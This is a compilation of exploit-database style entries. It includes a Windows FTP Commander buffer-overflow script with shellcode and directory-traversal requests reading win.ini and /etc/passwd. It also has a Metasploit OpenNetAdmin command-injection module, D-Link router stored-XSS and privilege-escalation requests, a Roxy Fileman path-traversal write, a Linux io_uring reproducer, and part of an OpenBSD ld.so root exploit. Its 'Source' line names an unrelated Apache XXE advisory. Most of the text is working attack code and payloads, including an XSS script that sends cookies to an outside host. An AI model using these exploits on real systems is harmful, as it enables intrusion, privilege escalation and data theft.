Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
# Windows 10 Education 1909 (32-bit; OS-build=18363.418)
# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+
# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
# Other Security Issue:
# - The program's default install path is: C:\\cftp\cftp.exe
#!/usr/bin/python
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
try:
# EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly
# EIP jump lands at the beginning of the buffer
# Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
#x86/alpha_upper succeeded with size 447 (iteration=0)
shellcode = b""
shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
# Fill the rest of the space with B's until we are at our EIP offset
offset = '\x42'*(4108-len(nops+shellcode))
# The EAX register holds a Pointer to the beginning of our buffer
# FF20 = jmp [eax]
# !mona find -o -s '\xFF\x20'
# 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
# | ASLR: False; Rebase: False; SafeSEH: False;
eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00
# After jmp [eax], we land at the beginning of our buffer
payload = nops+shellcode+offset+eip
File = 'poc.txt'
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
except:
print err + File + ' failed to create'
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
# Date: 2019-12-11
# Author: Numan Türle
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
POC
---------
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNetAdmin Ping Command Injection',
'Description' => %q{
This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
},
'Author' =>
[
'mattpascoe', # Vulnerability discovery
'Onur ER <onur@onurer.net>' # Metasploit module
],
'References' =>
[
['EDB', '47691']
],
'DisclosureDate' => '2019-11-19',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultOptions' =>
{
'RPORT' => 80,
'payload' => 'linux/x86/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options(
[
OptString.new('VHOST', [false, 'HTTP server virtual host']),
OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
]
)
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'vars_post' => {
'xajax' => 'window_open',
'xajaxargs[]' => 'app_about'
}
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.body =~ /OpenNetAdmin/i
return CheckCode::Safe
end
opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
version = Gem::Version.new('opennetadmin_version')
if version
vprint_status "OpenNetAdmin version #{version}"
end
if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
return CheckCode::Appears
end
CheckCode::Detected
end
def exploit
print_status('Exploiting...')
execute_cmdstager(flavor: :printf)
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
end
def execute_command(cmd, opts = {})
post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
begin
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
# Date: 2019-12-13
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19742
Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
#Burp Intercept
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: CVE-2019-19743
# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin)
# by changing privileges id (1 to 2) with burp suite.
# Privilege Escalation Post Request
POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1
username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
# Now log in with newly created root (ptguy) user. You have all administrator rights.
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
# Author: Patrik Lantz
# Date: 2019-12-06
# Software: Roxy Fileman
# Version: 1.4.5
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
# CVE: CVE-2019-19731
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.
Proof of Concept
===========================
It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.
1) Create a shortcut file
By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.
2) Upload the file
Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.
Details of the request:
POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
-----------------------------159382831523528
Content-Disposition: form-data; name="action"
upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"
ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"
/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream
...data omitted...
-----------------------------159382831523528--
3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.
POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
Workaround / Fix:
===========================
Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
CREATEDIR, COPYFILE and RENAMEFILE.
Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published
Discovered By:
===========================
Patrik Lantz
# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Date: 2019-12-17
# Exploit Author: MTK
# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
# Software Link: https://www.zendesk.com/apps/support/survey/
# Version: Up to v1.6
# Tested on: Zendesk - Firefox/Windows
# Software description:
# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question.
# You can get more granular satisfaction data without compromising the response rate.
# Ask an optional NPS question on the landing page. View reports and drill down into the response
# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
# your trigger or automation. Customize the landing pages for each of your brands.
# Technical Details & Impact:
# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
# for later use. The payload is automatically served to users who browse web pages and executed in
# their context. Thus, the victims do not need to click on a malicious link to run the payload.
# All they have to do is visit a vulnerable web page.
# POC
1. Open Support ticket in Zendesk and send XSS payload e.g;
<script>alert(1);</script>
2. Generate survey request to rate the ticket and payload will execute;
# Time line
09-19-2019 - Vulnerability discovered
09-20-2019 - Vendor contacted
12-02-2019 - Detailed report shared and full disclosure time line given with no response
12-17-2019 - Full Disclosure
Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.
The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:
- sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
datagram socket ends up performing filesystem access checks
- sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
process credentials
- sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
capability checks against the calling process
When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.
To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times, with
accesses to the struct msghdr in between: The attacker can first submit an SQE
of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.
Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:
==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;
static void *uffd_thread(void *dummy) {
struct uffd_msg msg;
int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
if (res != sizeof(msg)) errx(1, "uffd read");
printf("got userfaultfd message\n");
sqes[0].opcode = IORING_OP_SENDMSG;
union {
struct iovec iov;
char pad[0x1000];
} vec = {
.iov = real_iov
};
struct uffdio_copy copy = {
.dst = (unsigned long)iov,
.src = (unsigned long)&vec,
.len = 0x1000
};
SYSCHK(ioctl(uffd, UFFDIO_COPY, ©));
return NULL;
}
int main(void) {
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, ¶ms));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));
// prepare userfaultfd-trapped IO vector page
iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
struct uffdio_api api = { .api = UFFD_API, .features = 0 };
SYSCHK(ioctl(uffd, UFFDIO_API, &api));
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = { .start = (unsigned long)iov, .len = 0x1000 }
};
SYSCHK(ioctl(uffd, UFFDIO_REGISTER, ®));
pthread_t thread;
if (pthread_create(&thread, NULL, uffd_thread, NULL))
errx(1, "pthread_create");
// construct netlink message
int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
struct sockaddr_nl addr = {
.nl_family = AF_NETLINK
};
struct {
struct nlmsghdr hdr;
struct ifaddrmsg body;
struct rtattr opthdr;
unsigned char addr[4];
} __attribute__((packed)) msgbuf = {
.hdr = {
.nlmsg_len = sizeof(msgbuf),
.nlmsg_type = RTM_NEWADDR,
.nlmsg_flags = NLM_F_REQUEST
},
.body = {
.ifa_family = AF_INET,
.ifa_prefixlen = 32,
.ifa_flags = IFA_F_PERMANENT,
.ifa_scope = 0,
.ifa_index = 1
},
.opthdr = {
.rta_len = sizeof(struct rtattr) + 4,
.rta_type = IFA_LOCAL
},
.addr = { 1, 2, 3, 4 }
};
real_iov.iov_base = &msgbuf;
real_iov.iov_len = sizeof(msgbuf);
struct msghdr msg = {
.msg_name = &addr,
.msg_namelen = sizeof(addr),
.msg_iov = iov,
.msg_iovlen = 1,
};
// send netlink message via uring
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_RECVMSG,
.fd = sock,
.addr = (unsigned long)&msg
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
(*(int*)(sq_ring + params.sq_off.tail))++;
int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
printf("submitted %d, getevents done\n", submitted);
int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
printf("cq_tail = %d\n", cq_tail);
if (cq_tail != 1) errx(1, "expected cq_tail==1");
struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
if (cqe->res < 0) {
printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res));
} else {
printf("result: %d\n", cqe->res);
}
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet 1.2.3.4/32 scope global lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$
==========================================================================
The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like "ps aux". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?
While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.
Qualys Security Advisory
Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726)
==============================================================================
Contents
==============================================================================
Summary
Analysis
Demonstration
Acknowledgments
==============================================================================
Summary
==============================================================================
We discovered a Local Privilege Escalation in OpenBSD's dynamic loader
(ld.so): this vulnerability is exploitable in the default installation
(via the set-user-ID executable chpass or passwd) and yields full root
privileges.
We developed a simple proof of concept and successfully tested it
against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both
amd64 and i386; other releases and architectures are probably also
exploitable.
==============================================================================
Analysis
==============================================================================
In this section, we analyze a step-by-step execution of our proof of
concept:
------------------------------------------------------------------------------
1/ We execve() the set-user-ID /usr/bin/chpass, but first:
1a/ we set the LD_LIBRARY_PATH environment variable to one single dot
(the current working directory) and approximately ARG_MAX colons (the
maximum number of bytes for the argument and environment list); as
described in man ld.so:
LD_LIBRARY_PATH
A colon separated list of directories, prepending the default
search path for shared libraries. This variable is ignored for
set-user-ID and set-group-ID executables.
1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *)
(2MB on amd64, 1MB on i386); as described in man setrlimit:
RLIMIT_DATA The maximum size (in bytes) of the data segment for a
process; this includes memory allocated via malloc(3) and
all other anonymous memory mapped via mmap(2).
------------------------------------------------------------------------------
2/ Before the main() function of chpass is executed, the _dl_boot()
function of ld.so is executed and calls _dl_setup_env():
262 void
263 _dl_setup_env(const char *argv0, char **envp)
264 {
...
271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp));
...
283 _dl_trust = !_dl_issetugid();
284 if (!_dl_trust) { /* Zap paths if s[ug]id... */
285 if (_dl_libpath) {
286 _dl_free_path(_dl_libpath);
287 _dl_libpath = NULL;
288 _dl_unsetenv("LD_LIBRARY_PATH", envp);
289 }
------------------------------------------------------------------------------
3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH
environment variable and passes it to _dl_split_path():
23 char **
24 _dl_split_path(const char *searchpath)
25 {
..
35 pp = searchpath;
36 while (*pp) {
37 if (*pp == ':' || *pp == ';')
38 count++;
39 pp++;
40 }
..
45 retval = _dl_reallocarray(NULL, count, sizeof(*retval));
46 if (retval == NULL)
47 return (NULL);
------------------------------------------------------------------------------
4/ At line 45, count is approximately ARG_MAX (the number of colons in
our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our
low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL.
------------------------------------------------------------------------------
5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH
is ignored, but it is not deleted from the environment (CVE-2019-19726):
although _dl_trust is false (_dl_issetugid() returns true because chpass
is set-user-ID), _dl_unsetenv() is not called (line 288) because
_dl_libpath is NULL (line 285).
------------------------------------------------------------------------------
6/ Next, the main() function of chpass is executed, and it:
6a/ calls setuid(0), which sets the real and effective user IDs to 0;
6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY;
6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb
(unlike execve(), execv() does not reset the environment).
------------------------------------------------------------------------------
7/ Before the main() function of pwd_mkdb is executed, the _dl_boot()
function of ld.so is executed and calls _dl_setup_env():
7a/ at line 271, _dl_getenv() returns a pointer to our
LD_LIBRARY_PATH environment variable (because it was not deleted from
the environment in step 5, and because execv() did not reset the
environment in step 6c);
7b/ at line 45, _dl_reallocarray() does not return NULL anymore
(because our low RLIMIT_DATA was reset in step 6b);
7c/ as a result, _dl_libpath is not NULL (line 271), and it is not
reset to NULL (line 287) because _dl_trust is true (_dl_issetugid()
returns false because pwd_mkdb is not set-user-ID, and because the
real and effective user IDs were both set to 0 in step 6a): our
LD_LIBRARY_PATH is not ignored anymore.
------------------------------------------------------------------------------
8/ Finally, ld.so searches for shared libraries in _dl_libpath (our
LD_LIBRARY_PATH) and loads our own library from the current working
directory (the dot in our LD_LIBRARY_PATH).
------------------------------------------------------------------------------
==============================================================================
Demonstration
==============================================================================
In this section, we demonstrate the use of our proof of concept:
------------------------------------------------------------------------------
$ id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
$ cd /tmp
$ cat > lib.c << "EOF"
#include <paths.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
if (setuid(0) != 0) _exit(__LINE__);
if (setgid(0) != 0) _exit(__LINE__);
char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
execve(argv[0], argv, NULL);
_exit(__LINE__);
}
EOF
$ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED
0x0000000000000001 (NEEDED) Shared library: [libutil.so.13.1]
0x0000000000000001 (NEEDED) Shared library: [libc.so.95.1]
